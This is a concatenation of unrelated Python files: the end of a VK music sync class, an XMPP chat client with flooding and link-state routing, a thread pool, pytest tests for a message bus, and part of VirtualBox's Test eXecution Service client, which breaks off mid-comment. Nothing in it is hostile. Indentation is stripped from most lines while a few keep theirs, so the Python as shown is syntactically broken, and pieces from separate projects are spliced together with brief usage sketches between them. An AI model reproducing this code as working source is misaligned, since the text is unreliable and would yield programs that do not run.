finally:
queue.task_done()
i = 0
for song_info in songs['response']:
song = self.song_class(self.storage, song_info)
if song.in_blacklist():
continue
else:
to_sync['new'].append(song.name)
queue.put((i, song))
i += 1
# Setup threads
for i in range(self.SETTINGS['threads']):
t = threading.Thread(target=worker)
t.daemon = True
t.start()
queue.join() # block until all tasks are done
# Then do cleanup
if self.SETTINGS['from'] == 0 and self.SETTINGS['to'] is None:
to_remove = list(set(to_sync['old']) - set(to_sync['new']))
for i, f in enumerate(to_remove, 1):
try:
Song(self.storage, {'name': f}).remove()
stats['removed'] += 1
print_out("%s. Removed %s" % (i, f))
except OSError as e:
stats['not_removed'] += 1
print_out("{}. Error while removing {}, exc_info: {}".format(i, f, e))
print_out('That is all. Enjoy.')
return stats
def exit(self, *args, **kwargs):
self.__exit__()
print_out(*args, **kwargs)
return exit()
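
A minimal usage sketch. The storage backend is an assumption: any object exposing the exists/touch/remove/write/files_list/get_id methods used above will do, and the client_id/uid values are placeholders:

from vk_music.storages import FsStorage  # hypothetical storage backend

storage = FsStorage('~/Music/vk')
with VkMusic(storage, client_id='1234567', uid='987654', threads=4) as vk:
    vk.synchronize()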
session.py
from slixmpp import ClientXMPP
from slixmpp.exceptions import IqError, IqTimeout
from slixmpp.xmlstream.asyncio import asyncio
from threading import Thread
from chat.menu import menu
from utils import getNeighbours, getAlgorithm, generateLSP
from graph import Graph, shortest_path
import pickle
import logging
import sys
import uuid
import blessed
import algorithms.flooding as f
import json
# Start the blessed terminal used for UI
term = blessed.Terminal()
mem = {
'emisor': 'R',
'weight': 100,
'nodes': 'none',
'msg': 'msg'
}
class Session(ClientXMPP):
def __init__(self, jid, password, relations, algorithm, name):
ClientXMPP.__init__(self, jid, password)
        ''' Add all event handlers, the nickname, and
        start the receiver on alumchat '''
self.add_event_handler('session_start', self.session_start)
self.add_event_handler('message', self.message)
self.room = 'alumnos'
self.current_reciever = 'alumchat.xyz'
self.auto_subscribe = True
self.relations = relations
self.algorithm_name = algorithm
self.algorithm = getAlgorithm(algorithm)
self.serial = 1
self.neighbours = getNeighbours(relations, name)
self.graph = Graph()
self.name = name
self.lsps = {}
# Functions sent as arguments to main menu
functions = {
'dc': self.dc_and_exit,
'list': self.get_contacts,
'add': self.add_contact,
'rm': self.delete_account,
'send_message': self.message_sender,
'jc': self.join_conversation,
'find': self.start_algorithm,
'd' : self.direct_message
}
self.menuInstance = Thread(target = menu, args = (functions,))
self.add_event_handler('register', self.register)
def session_start(self, event):
''' Handler for successful connection,
start the menu thread '''
self.send_presence()
self.get_roster()
#Start the graph by adding ourselves and our neighbours
self.graph.addNode(self.name)
for node in self.neighbours:
self.graph.addNode(node)
self.graph.addEdge(self.name, node, self.neighbours[node])
self.start_algorithm({})
self.menuInstance.start()
def start_algorithm(self, args):
''' Where the magic happens, start sending hellos to neighbours
and hope for the best '''
if self.algorithm_name in ('lsr', 'dvr'):
self.send_to_neighbours(generateLSP(self.name, self.neighbours, self.serial), 'start')
self.serial += 1
def dc_and_exit(self, args):
''' Disconect from server and exit the
program
BUG: For some reason after using blessed's
fullscreeen sys.exit() doesn't exit the program correctly '''
        self.disconnect(wait=2.0)
        sys.exit()
def message_error(self, msg):
''' Error messages '''
print(term.bold_red('ha ocurrido un error'))
print(msg)
def message(self, msg):
''' Handler for normal messages '''
if msg['type'] in ('chat', 'normal'):
            if msg['subject'] == 'flood':
jmsg = msg['body']
og_msg = json.loads(jmsg)
if og_msg['final_to'] == self.boundjid.jid.split('/')[0]:
if og_msg['og_from'] == mem['emisor'] and og_msg['msg'] == mem['msg']:
if int(og_msg['weight']) < mem['weight']:
mem['weight'] = og_msg['weight']
mem['nodes'] = og_msg['node_list']
else:
print(mem['weight'])
print(mem['nodes'])
print(term.cyan(og_msg['og_from'] +': '+og_msg['msg']))
mem['weight'] = og_msg['weight']
mem['nodes'] = og_msg['node_list']
mem['emisor'] = og_msg['og_from']
mem['msg'] = og_msg['msg']
return 0
elif og_msg['hops'] != 0:
self.resend(og_msg, msg['from'])
elif msg['subject'] in ('start', 'resend'):
resend_message = self.algorithm(self, msg)
self.send_to_neighbours(resend_message, 'resend') if resend_message else None
            elif msg['subject'] == 'lsr_message':
body = json.loads(msg['body'])
path = body['path']
print(path)
if path[-1] == self.name:
print(term.magenta(str(msg['from'])+ ' > ') + term.color(55)(body['msg']))
print('DISTANCIA RECORRIDA:' + term.color(55)(str(body['distance'])))
else:
next_hop = path.index(self.name) + 1
self.send_message(mto = path[next_hop]+'@alumchat.xyz', mbody = msg['body'], msubject = 'lsr_message', mfrom = self.boundjid)
else:
print(term.magenta(str(msg['from'])+ ' > ') + term.color(55)(msg['body']))
    def send_to_neighbours(self, message, subject):
        for neighbour in self.neighbours:
            self.send_message(mto = neighbour+'@alumchat.xyz', mbody = message, msubject = subject, mfrom = self.boundjid)
def add_contact(self, contact):
''' Add contact to contact list
TODO: Currently no handling of error when adding user '''
self.send_presence_subscription(pto=contact)
print(term.bold_green(contact + ' es ahora tu contacto'))
def get_contacts(self, args):
''' Print all contacts on contact list '''
print(term.magenta('Users in your contact list: '))
for jid in self.roster[self.jid]:
print(term.cyan(jid))
def join_conversation(self, args):
''' Method used to change the guy we are currently speaking to
returns an error in case that user is not in our contacts list '''
if args in self.roster[self.jid]:
self.current_reciever = args
else:
print(term.bold_red('ERROR: Usuario no en la lista de contactos'))
def message_sender(self, args):
''' Send normal message
TODO: Make it alternate between muc and normal given the conversation context '''
self.send_message(mto=self.current_reciever, mbody=args, msubject='normal message', mfrom=self.boundjid)
def direct_message(self, args):
content = input('Mensaje? ')
        if self.algorithm_name == 'flooding':
body = {
'og_from': str(self.boundjid),
'final_to': args+'@alumchat.xyz',
'hops': 3,
'distance': 0,
'node_list': self.boundjid.jid,
'msg': content,
'weight': 0,
}
#Send Direct Message
for x in self.neighbours:
body['weight'] = self.neighbours[x]
jbody = json.dumps(body)
self.send_message(mto = x+'@alumchat.xyz', mbody = jbody, msubject = 'flood', mfrom = self.boundjid)
elif self.algorithm_name == 'lsr':
path = shortest_path(self.graph, self.name, args.upper())
body = {
'from': self.name,
'to': args+'@alumchat.xyz',
'path': path[1],
'distance': path[0],
'msg': content
}
self.send_message(mto = path[1][1]+'@alumchat.xyz', mbody = json.dumps(body), msubject = 'lsr_message', mfrom = self.boundjid)
else:
self.send_message(mto = args+'@alumchat.xyz', mbody = content, msubject = 'normal chat', mfrom = self.boundjid)
def resend(self, og, sender):
body = {
'og_from': og['og_from'],
'final_to': og['final_to'],
'hops': og['hops'] - 1,
'distance': og['distance'] + 1,
'node_list': og['node_list'] + self.boundjid.jid,
'msg': og['msg'],
'weight': og['weight']
}
for x in self.neighbours:
if x.lower()+'@alumchat.xyz' != str(sender).split('/')[0]:
body['weight'] = body['weight'] + self.neighbours[x]
jbody = json.dumps(body)
self.send_message(mto = x+'@alumchat.xyz', mbody = jbody, msubject = 'flood', mfrom = self.boundjid)
def delete_account(self, args):
''' Helper function to delete account '''
asyncio.run(self.delete_account_send())
async def delete_account_send(self):
# Manual build of delete account iq
resp = self.Iq()
resp['type'] = 'set'
resp['from'] = self.boundjid.jid
resp['register'] = ' '
resp['register']['remove'] = ' '
try:
await resp.send()
print('')
except IqError:
print(term.bold_red('Error al eliminar cuenta'))
except IqTimeout:
print(term.bold_red('timeout'))
self.disconnect()
async def register(self, iq):
        ''' Registration handler, called on every connection.
        If your account already exists it does nothing; if
        it is new, it registers you.
        TODO: Find a way to skip this function if your account
        already exists '''
resp = self.Iq()
resp['type'] = 'set'
resp['register']['username'] = self.boundjid.user
resp['register']['password'] = self.password
try:
await resp.send()
logging.info('Account created for %s!' % self.boundjid)
except IqError as e:
logging.error('Could not register account: %s' %e.iq['error']['text'])
except IqTimeout:
logging.error('No response from server.')
self.disconnect()
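
A minimal bootstrap sketch, guessing at how the project's entry point drives this class (the relations dict shape matches what getNeighbours and Graph consume above; the JID, password, and weights are illustrative):

relations = {'A': {'B': 1}, 'B': {'A': 1, 'C': 4}, 'C': {'B': 4}}
xmpp = Session('a@alumchat.xyz', 'secret', relations, 'lsr', 'A')
xmpp.connect()
xmpp.process(forever=True)  # slixmpp event loop; fires session_start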
thread_pool.py
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
# File : thread_pool.py
# Time :2020/8/19 15:09
# Author :Rodney Cheung
"""
import contextlib
import queue
import threading
StopEvent = object()
class ThreadPool(object):
def __init__(self, max_num, max_task_num=None):
if max_task_num:
self.q = queue.Queue(max_task_num)
else:
self.q = queue.Queue()
self.max_num = max_num
self.cancel = False
self.terminal = False
self.generate_list = []
self.free_list = []
def run(self, func, args, callback=None):
"""
线程池执行一个任务
:param func: 任务函数
:param args: 任务函数所需参数
:param callback: 任务执行失败或成功后执行的回调函数,回调函数有两个参数1、任务函数执行状态;2、任务函数返回值(默认为None,即:不执行回调函数)
:return: 如果线程池已经终止,则返回True否则None
"""
if self.cancel:
return
if len(self.free_list) == 0 and len(self.generate_list) < self.max_num:
self.generate_thread()
w = (
func,
args,
callback,
)
self.q.put(w)
def generate_thread(self):
"""
创建一个线程
"""
t = threading.Thread(target=self.call)
t.start()
def call(self):
"""
循环去获取任务函数并执行任务函数
"""
        current_thread = threading.current_thread()
self.generate_list.append(current_thread)
event = self.q.get()
while event != StopEvent:
func, arguments, callback = event
try:
result = func(*arguments)
success = True
except Exception:
success = False
result = None
if callback is not None:
try:
callback(success, result)
except Exception:
pass
with self.worker_state(self.free_list, current_thread):
if self.terminal:
event = StopEvent
else:
event = self.q.get()
else:
self.generate_list.remove(current_thread)
def close(self):
"""
执行完所有的任务后,所有线程停止
"""
self.cancel = True
full_size = len(self.generate_list)
while full_size:
self.q.put(StopEvent)
full_size -= 1
def terminate(self):
"""
无论是否还有任务,终止线程
"""
self.terminal = True
while self.generate_list:
self.q.put(StopEvent)
        while not self.q.empty():   # drain any leftover events
            self.q.get()
def is_busy(self):
return len(self.generate_list) > 0
@contextlib.contextmanager
def worker_state(self, state_list, worker_thread):
"""
用于记录线程中正在等待的线程数
"""
state_list.append(worker_thread)
try:
yield
finally:
state_list.remove(worker_thread)
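
A minimal usage sketch of the pool above:

import time

def work(n):
    time.sleep(0.1)
    return n * n

def on_done(success, result):
    # success is False if the task raised; result is its return value
    print(success, result)

pool = ThreadPool(max_num=3)
for n in range(10):
    pool.run(work, (n,), callback=on_done)
pool.close()  # queues a StopEvent for every live worker; tasks already queued run first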
omnibus_test.py
import io
import multiprocessing as mp
import sys
import time
import pytest
from omnibus import Sender, Receiver, Message, server
from omnibus.omnibus import OmnibusCommunicator
class TestOmnibus:
@pytest.fixture(autouse=True, scope="class")
def server(self):
# start server
ctx = mp.get_context('spawn') # threadsafe multiprocess method
p = ctx.Process(target=server.server)
p.start()
OmnibusCommunicator.server_ip = "127.0.0.1" # skip discovery
# wait until the server is alive
s = Sender()
r = Receiver("_ALIVE")
while r.recv(1) is None:
s.send("_ALIVE", "_ALIVE")
yield
# stop the server
p.terminate()
p.join()
@pytest.fixture()
def sender(self):
return Sender # for consistency with receiver
@pytest.fixture()
def receiver(self):
def _receiver(*channels):
r = Receiver(*channels)
time.sleep(0.05) # let the receiver connect to the server so messages aren't dropped
return r
return _receiver
def test_nominal(self, sender, receiver):
s = sender()
r = receiver("CHAN")
s.send("CHAN", "A")
assert r.recv(10) == "A"
def test_channels(self, sender, receiver):
s1 = sender()
r1 = receiver("CHAN1")
s2 = sender()
r2 = receiver("CHAN2")
r3 = receiver("CHAN")
s1.send("CHAN1", "A")
assert r1.recv(10) == "A"
assert r3.recv(10) == "A"
assert r2.recv(10) is None
s2.send("CHAN2", "B")
assert r2.recv(10) == "B"
assert r3.recv(10) == "B"
assert r1.recv(10) is None
def test_msg_objects(self, sender, receiver):
s = sender()
r = receiver("CHAN")
s.send_message(Message("CHAN", 10, "PAYLOAD"))
m = r.recv_message(10)
assert m.channel == "CHAN"
assert m.timestamp == 10
assert m.payload == "PAYLOAD"
    def test_multi_channel_receiving(self, sender, receiver):
s = sender()
r = receiver("CHAN1", "CHAN2", "CHAN3")
s.send("CHAN1", "A")
assert r.recv(10) == "A"
s.send("CHAN2", "B")
assert r.recv(10) == "B"
s.send("CHAN3", "C")
assert r.recv(10) == "C"
class TestIPBroadcast:
@pytest.fixture()
def broadcaster(self):
ctx = mp.get_context('spawn')
p = ctx.Process(target=server.ip_broadcast)
p.start()
yield
p.terminate()
p.join()
def test_broadcast(self, broadcaster, monkeypatch):
# respond to the IP prompt if discovery times out
monkeypatch.setattr(sys, "stdin", io.StringIO("timeout"))
# make sure the server_ip isn't stored from previous tests
OmnibusCommunicator.server_ip = None
c = OmnibusCommunicator()
assert c.server_ip == server.get_ip()
def test_timeout(self, monkeypatch):
# respond to the IP prompt if discovery times out
monkeypatch.setattr(sys, "stdin", io.StringIO("timeout"))
# make sure the server_ip isn't stored from previous tests
OmnibusCommunicator.server_ip = None
c = OmnibusCommunicator()
assert c.server_ip == "timeout"
txsclient.py
# -*- coding: utf-8 -*-
# $Id: txsclient.py 70660 2018-01-21 16:18:58Z vboxsync $
# pylint: disable=C0302
"""
Test eXecution Service Client.
"""
__copyright__ = \
"""
Copyright (C) 2010-2017 Oracle Corporation
This file is part of VirtualBox Open Source Edition (OSE), as
available from http://www.virtualbox.org. This file is free software;
you can redistribute it and/or modify it under the terms of the GNU
General Public License (GPL) as published by the Free Software
Foundation, in version 2 as it comes in the "COPYING" file of the
VirtualBox OSE distribution. VirtualBox OSE is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
The contents of this file may alternatively be used under the terms
of the Common Development and Distribution License Version 1.0
(CDDL) only, as it comes in the "COPYING.CDDL" file of the
VirtualBox OSE distribution, in which case the provisions of the
CDDL are applicable instead of those of the GPL.
You may elect to license modified versions of this file under the
terms and conditions of either the GPL or the CDDL or both.
"""
__version__ = "$Revision: 70660 $"
# Standard Python imports.
import array;
import errno;
import os;
import select;
import socket;
import sys;
import threading;
import time;
import zlib;
import uuid;
# Validation Kit imports.
from common import utils;
from testdriver import base;
from testdriver import reporter;
from testdriver.base import TdTaskBase;
# Python 3 hacks:
if sys.version_info[0] >= 3:
long = int; # pylint: disable=redefined-builtin,invalid-name
#
# Helpers for decoding data received from the TXS.
# These are used by both the Session and Transport classes.
#
def getU32(abData, off):
"""Get a U32 field."""
return abData[off] \
+ abData[off + 1] * 256 \
+ abData[off + 2] * 65536 \
+ abData[off + 3] * 16777216;
def getSZ(abData, off, sDefault = None):
"""
Get a zero-terminated string field.
Returns sDefault if the string is invalid.
"""
cchStr = getSZLen(abData, off);
if cchStr >= 0:
abStr = abData[off:(off + cchStr)];
try:
return abStr.tostring().decode('utf_8');
except:
reporter.errorXcpt('getSZ(,%u)' % (off));
return sDefault;
def getSZLen(abData, off):
"""
Get the length of a zero-terminated string field, in bytes.
Returns -1 if off is beyond the data packet or not properly terminated.
"""
cbData = len(abData);
if off >= cbData:
return -1;
offCur = off;
while abData[offCur] != 0:
offCur = offCur + 1;
if offCur >= cbData:
return -1;
return offCur - off;
def isValidOpcodeEncoding(sOpcode):
"""
Checks if the specified opcode is valid or not.
Returns True on success.
Returns False if it is invalid, details in the log.
"""
sSet1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
sSet2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_ ";
if len(sOpcode) != 8:
reporter.error("invalid opcode length: %s" % (len(sOpcode)));
return False;
    for i in range(0, 2):
if sSet1.find(sOpcode[i]) < 0:
reporter.error("invalid opcode char #%u: %s" % (i, sOpcode));
return False;
    for i in range(2, 8):
if sSet2.find(sOpcode[i]) < 0:
reporter.error("invalid opcode char #%u: %s" % (i, sOpcode));
return False;
return True;
#
# Helper for encoding data sent to the TXS.
#
def u32ToByteArray(u32):
"""Encodes the u32 value as a little endian byte (B) array."""
return array.array('B', \
( u32 % 256, \
(u32 // 256) % 256, \
(u32 // 65536) % 256, \
(u32 // 16777216) % 256) );
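# Quick sanity check for the two helpers above (illustrative only):
#   u32ToByteArray(0x12345678) -> array('B', [0x78, 0x56, 0x34, 0x12])
#   getU32(u32ToByteArray(0x12345678), 0) == 0x12345678   (little-endian round-trip)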
class TransportBase(object):
"""
Base class for the transport layer.
"""
def __init__(self, sCaller):
self.sDbgCreated = '%s: %s' % (utils.getTimePrefix(), sCaller);
self.fDummy = 0;
self.abReadAheadHdr = array.array('B');
def toString(self):
"""
Stringify the instance for logging and debugging.
"""
return '<%s: abReadAheadHdr=%s, sDbgCreated=%s>' % (type(self).__name__, self.abReadAheadHdr, self.sDbgCreated);
def __str__(self):
return self.toString();
def cancelConnect(self):
"""
Cancels any pending connect() call.
Returns None;
"""
return None;
def connect(self, cMsTimeout):
"""
Quietly attempts to connect to the TXS.
Returns True on success.
Returns False on retryable errors (no logging).
Returns None on fatal errors with details in the log.
Override this method, don't call super.
"""
_ = cMsTimeout;
return False;
def disconnect(self, fQuiet = False):
"""
Disconnect from the TXS.
Returns True.
Override this method, don't call super.
"""
_ = fQuiet;
return True;
def sendBytes(self, abBuf, cMsTimeout):
"""
Sends the bytes in the buffer abBuf to the TXS.
Returns True on success.
Returns False on failure and error details in the log.
Override this method, don't call super.
Remarks: len(abBuf) is always a multiple of 16.
"""
_ = abBuf; _ = cMsTimeout;
return False;
def recvBytes(self, cb, cMsTimeout, fNoDataOk):
"""
Receive cb number of bytes from the TXS.
Returns the bytes (array('B')) on success.
Returns None on failure and error details in the log.
Override this method, don't call super.
Remarks: cb is always a multiple of 16.
"""
_ = cb; _ = cMsTimeout; _ = fNoDataOk;
return None;
def isConnectionOk(self):
"""
Checks if the connection is OK.
Returns True if it is.
        Returns False if it isn't (caller should call disconnect).
Override this method, don't call super.
"""
return True;
def isRecvPending(self, cMsTimeout = 0):
"""
Checks if there is incoming bytes, optionally waiting cMsTimeout
milliseconds for something to arrive.
Returns True if there is, False if there isn't.
Override this method, don't call super.
"""
_ = cMsTimeout;
return False;
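    # Message framing used by sendMsgInt()/recvMsg() below, reconstructed from the
    # code rather than a TXS spec: a 16-byte header holding cbMsg (u32 LE), uCrc32
    # (u32 LE, computed over everything after the CRC field), and an 8-character
    # space-padded opcode, followed by the payload, with the whole message
    # zero-padded to a multiple of 16 bytes.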
def sendMsgInt(self, sOpcode, cMsTimeout, abPayload = array.array('B')):
"""
Sends a message (opcode + encoded payload).
Returns True on success.
Returns False on failure and error details in the log.
"""
# Fix + check the opcode.
if len(sOpcode) < 2:
reporter.fatal('sendMsgInt: invalid opcode length: %d (\"%s\")' % (len(sOpcode), sOpcode));
return False;
sOpcode = sOpcode.ljust(8);
if not isValidOpcodeEncoding(sOpcode):
reporter.fatal('sendMsgInt: invalid opcode encoding: \"%s\"' % (sOpcode));
return False;
        # Start constructing the message.
cbMsg = 16 + len(abPayload);
abMsg = array.array('B');
abMsg.extend(u32ToByteArray(cbMsg));
abMsg.extend((0, 0, 0, 0)); # uCrc32
try:
abMsg.extend(array.array('B', \
( ord(sOpcode[0]), \
ord(sOpcode[1]), \
ord(sOpcode[2]), \
ord(sOpcode[3]), \
ord(sOpcode[4]), \
ord(sOpcode[5]), \
ord(sOpcode[6]), \
ord(sOpcode[7]) ) ) );
if abPayload:
abMsg.extend(abPayload);
except:
reporter.fatalXcpt('sendMsgInt: packing problem...');
return False;
        # Checksum it, pad it and send it off.
uCrc32 = zlib.crc32(abMsg[8:]);
abMsg[4:8] = u32ToByteArray(uCrc32);
while len(abMsg) % 16:
abMsg.append(0);
reporter.log2('sendMsgInt: op=%s len=%d to=%d' % (sOpcode, len(abMsg), cMsTimeout));
return self.sendBytes(abMsg, cMsTimeout);
def recvMsg(self, cMsTimeout, fNoDataOk = False):
"""
Receives a message from the TXS.
Returns the message three-tuple: length, opcode, payload.
Returns (None, None, None) on failure and error details in the log.
"""
# Read the header.
if self.abReadAheadHdr:
assert(len(self.abReadAheadHdr) == 16);
abHdr = self.abReadAheadHdr;
self.abReadAheadHdr = array.array('B');
else:
abHdr = self.recvBytes(16, cMsTimeout, fNoDataOk);
if abHdr is None:
return (None, None, None);
if len(abHdr) != 16:
reporter.fatal('recvBytes(16) returns %d bytes!' % (len(abHdr)));
return (None, None, None);
# Unpack and validate the header.
cbMsg = getU32(abHdr, 0);
uCrc32 = getU32(abHdr, 4);
sOpcode = abHdr[8:16].tostring().decode('ascii');
if cbMsg < 16:
reporter.fatal('recvMsg: message length is out of range: %s (min 16 bytes)' % (cbMsg));
return (None, None, None);
if cbMsg > 1024*1024:
reporter.fatal('recvMsg: message length is out of range: %s (max 1MB)' % (cbMsg));
return (None, None, None);
if not isValidOpcodeEncoding(sOpcode):
reporter.fatal('recvMsg: invalid opcode \"%s\"' % (sOpcode));
return (None, None, None);
# Get the payload (if any), dropping the padding.
abPayload = array.array('B');
if cbMsg > 16:
if cbMsg % 16:
cbPadding = 16 - (cbMsg % 16);
else:
cbPadding = 0;
abPayload = self.recvBytes(cbMsg - 16 + cbPadding, cMsTimeout, False);
if abPayload is None:
self.abReadAheadHdr = abHdr;
if not fNoDataOk :
reporter.log('recvMsg: failed to recv payload bytes!');
return (None, None, None);
while cbPadding > 0:
abPayload.pop();
cbPadding = cbPadding - 1;
# Check the CRC-32.
if uCrc32 != 0:
uActualCrc32 = zlib.crc32(abHdr[8:]);
if cbMsg > 16:
uActualCrc32 = zlib.crc32(abPayload, uActualCrc32);
uActualCrc32 = uActualCrc32 & 0xffffffff;
if uCrc32 != uActualCrc32:
reporter.fatal('recvMsg: crc error: expected %s, got %s' % (hex(uCrc32), hex(uActualCrc32)));
return (None, None, None);
reporter.log2('recvMsg: op=%s len=%d' % (sOpcode, len(abPayload)));
return (cbMsg, sOpcode, abPayload);
def sendMsg(self, sOpcode, cMsTimeout, aoPayload = ()):
"""
Sends a message (opcode + payload tuple).
Returns True on success.
Returns False on failure and error details in the log.
        Returns None if you pass incorrectly typed parameters.
"""
# Encode the payload.
abPayload = array.array('B');
for o in aoPayload:
try:
if utils.isString(o):
if sys.version_info[0] >= 3:
abPayload.extend(o.encode('utf_8'));
else:
# the primitive approach...
sUtf8 = o.encode('utf_8');
for ch in sUtf8:
abPayload.append(ord(ch))
abPayload.append(0);
elif isinstance(o, long):
if o < 0 or o > 0xffffffff:
reporter.fatal('sendMsg: uint32_t payload is out of range: %s' % (hex(o)));
return None;
abPayload.extend(u32ToByteArray(o));
elif isinstance(o, array.array):
abPayload.extend(o);
else:
reporter.fatal('sendMsg: unexpected payload type: %s (%s) (aoPayload=%s)' % (type(o), o, aoPayload));
return None;
except:
reporter.fatalXcpt('sendMsg: screwed up the encoding code...');
return None;
return self.sendMsgInt(sOpcode, cMsTimeout, abPayload);
class Session(TdTaskBase):
"""
A Test eXecution Service (TXS) client session.
"""
def __init__(self, oTransport, cMsTimeout, cMsIdleFudge, fTryConnect = False):
"""
Construct a TXS session.
This starts by connecting to the TXS and will enter the signalled state
when connected or the timeout has been reached.
"""
TdTaskBase.__init__(self, utils.getCallerName());
self.oTransport = oTransport;
self.sStatus = "";
self.cMsTimeout = 0;
self.fErr = True; # Whether to report errors as error.
self.msStart = 0;
self.oThread = None;
self.fnTask = self.taskDummy;
self.aTaskArgs = None;
self.oTaskRc = None;
self.t3oReply = (None, None, None);
self.fScrewedUpMsgState = False;
self.fTryConnect = fTryConnect;
if not self.startTask(cMsTimeout, False, "connecting", self.taskConnect, (cMsIdleFudge,)):
raise base.GenError("startTask failed");
def __del__(self):
"""Make sure to cancel the task when deleted."""
self.cancelTask();
def toString(self):
return '<%s fnTask=%s, aTaskArgs=%s, sStatus=%s, oTaskRc=%s, cMsTimeout=%s,' \
' msStart=%s, fTryConnect=%s, fErr=%s, fScrewedUpMsgState=%s, t3oReply=%s oTransport=%s, oThread=%s>' \
% (TdTaskBase.toString(self), self.fnTask, self.aTaskArgs, self.sStatus, self.oTaskRc, self.cMsTimeout,
self.msStart, self.fTryConnect, self.fErr, self.fScrewedUpMsgState, self.t3oReply, self.oTransport, self.oThread);
def taskDummy(self):
"""Place holder to catch broken state handling."""
raise Exception();
def startTask(self, cMsTimeout, fIgnoreErrors, sStatus, fnTask, aArgs = ()):
"""
        Kicks off a new task.
        cMsTimeout:     The task timeout in milliseconds. Values less than
                        500 ms will be adjusted to 500 ms. This means it is
                        OK to use a negative value.
sStatus: The task status.
fnTask: The method that'll execute the task.
aArgs: Arguments to pass to fnTask.
Returns True on success, False + error in log on failure.
"""
if not self.cancelTask():
reporter.maybeErr(not fIgnoreErrors, 'txsclient.Session.startTask: failed to cancel previous task.');
return False;
# Change status and make sure we're the only ones starting a task.
self.lockTask();
if self.sStatus != "":
self.unlockTask();
reporter.maybeErr(not fIgnoreErrors, 'txsclient.Session.startTask: race.');
return False;
self.sStatus = "setup";
self.oTaskRc = None;
self.t3oReply = (None, None, None);
self.resetTaskLocked();
self.unlockTask();
self.cMsTimeout = max(cMsTimeout, 500);
self.fErr = not fIgnoreErrors;
self.fnTask = fnTask;
self.aTaskArgs = aArgs;
self.oThread = threading.Thread(target=self.taskThread, args=(), name=('TXS-%s' % (sStatus)));
self.oThread.setDaemon(True);
self.msStart = base.timestampMilli();
self.lockTask();
self.sStatus = sStatus;
self.unlockTask();
self.oThread.start();
return True;
def cancelTask(self, fSync = True):
"""
Attempts to cancel any pending tasks.
Returns success indicator (True/False).
"""
self.lockTask();
if self.sStatus == "":
self.unlockTask();
return True;
if self.sStatus == "setup":
self.unlockTask();
return False;
if self.sStatus == "cancelled":
self.unlockTask();
return False;
reporter.log('txsclient: cancelling "%s"...' % (self.sStatus));
if self.sStatus == 'connecting':
self.oTransport.cancelConnect();
self.sStatus = "cancelled";
oThread = self.oThread;
self.unlockTask();
if not fSync:
return False;
oThread.join(61.0);
return not oThread.isAlive();
def taskThread(self):
"""
The task thread function.
This does some housekeeping activities around the real task method call.
"""
if not self.isCancelled():
try:
fnTask = self.fnTask;
oTaskRc = fnTask(*self.aTaskArgs);
except:
reporter.fatalXcpt('taskThread', 15);
oTaskRc = None;
else:
reporter.log('taskThread: cancelled already');
self.lockTask();
reporter.log('taskThread: signalling task with status "%s", oTaskRc=%s' % (self.sStatus, oTaskRc));
self.oTaskRc = oTaskRc;
self.oThread = None;
self.sStatus = '';
self.signalTaskLocked();
self.unlockTask();
return None;
def isCancelled(self):
"""Internal method for checking if the task has been cancelled."""
self.lockTask();
sStatus = self.sStatus;
self.unlockTask();
if sStatus == "cancelled":
return True;
return False;
def hasTimedOut(self):
"""Internal method for checking if the task has timed out or not."""
cMsLeft = self.getMsLeft();
if cMsLeft <= 0:
return True;
return False;
def getMsLeft(self, cMsMin = 0, cMsMax = -1):
"""Gets the time left until the timeout."""
cMsElapsed = base.timestampMilli() - self.msStart;
if cMsElapsed < 0:
return cMsMin;
cMsLeft = self.cMsTimeout - cMsElapsed;
if cMsLeft <= cMsMin:
return cMsMin;
if cMsLeft > cMsMax and cMsMax > 0:
return cMsMax;
return cMsLeft;
def recvReply(self, cMsTimeout = None, fNoDataOk = False):
"""
Wrapper for TransportBase.recvMsg that stashes the response away
so the client can inspect it later on.
"""
if cMsTimeout is None:
cMsTimeout = self.getMsLeft(500);
cbMsg, sOpcode, abPayload = self.oTransport.recvMsg(cMsTimeout, fNoDataOk);
self.lockTask();
self.t3oReply = (cbMsg, sOpcode, abPayload);
self.unlockTask();
return (cbMsg, sOpcode, abPayload);
def recvAck(self, fNoDataOk = False):
"""
Receives an ACK or error response from the TXS.
Returns True on success.
Returns False on timeout or transport error.
Returns (sOpcode, sDetails) tuple on failure. The opcode is stripped
and there are always details of some sort or another.
"""
cbMsg, sOpcode, abPayload = self.recvReply(None, fNoDataOk);
if cbMsg is None:
return False;
sOpcode = sOpcode.strip();
if sOpcode == "ACK":
return True;
return (sOpcode, getSZ(abPayload, 0, sOpcode));
def recvAckLogged(self, sCommand, fNoDataOk = False):
"""
Wrapper for recvAck and logging.
Returns True on success (ACK).
Returns False on timeout, transport error and errors signalled by TXS.
"""
rc = self.recvAck(fNoDataOk);
if rc is not True and not fNoDataOk:
if rc is False:
reporter.maybeErr(self.fErr, 'recvAckLogged: %s transport error' % (sCommand));
else:
reporter.maybeErr(self.fErr, 'recvAckLogged: %s response was %s: %s' % (sCommand, rc[0], rc[1]));
rc = False;
return rc;
def recvTrueFalse(self, sCommand):
"""
Receives a TRUE/FALSE response from the TXS.
Returns True on TRUE, False on FALSE and None on error/other (logged).
"""
cbMsg, sOpcode, abPayload = self.recvReply();
if cbMsg is None:
reporter.maybeErr(self.fErr, 'recvTrueFalse: %s transport error' % (sCommand));
return None;
sOpcode = sOpcode.strip();
if sOpcode == "TRUE":
return True;
if sOpcode == "FALSE":
return False;
reporter.maybeErr(self.fErr, 'recvTrueFalse: %s response was %s: %s' % (sCommand, sOpcode, getSZ(abPayload, 0, sOpcode)));
return None;
def sendMsg(self, sOpcode, aoPayload = (), cMsTimeout = None):
"""
Wrapper for TransportBase.sendMsg that inserts the correct timeout.
"""
if cMsTimeout is None:
cMsTimeout = self.getMsLeft(500);
return self.oTransport.sendMsg(sOpcode, cMsTimeout, aoPayload);
def asyncToSync(self, fnAsync, *aArgs):
"""
Wraps an asynchronous task into a synchronous operation.
Returns False on failure, task return status on success.
"""
rc = fnAsync(*aArgs);
if rc is False:
reporter.log2('asyncToSync(%s): returns False (#1)' % (fnAsync));
return rc;
rc = self.waitForTask(self.cMsTimeout + 5000);
if rc is False:
reporter.maybeErrXcpt(self.fErr, 'asyncToSync: waitForTask failed...');
self.cancelTask();
#reporter.log2('asyncToSync(%s): returns False (#2)' % (fnAsync, rc));
return False;
rc = self.getResult();
#reporter.log2('asyncToSync(%s): returns %s' % (fnAsync, rc));
return rc;
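#
# Usage sketch: every sync* method below is just asyncToSync applied to its
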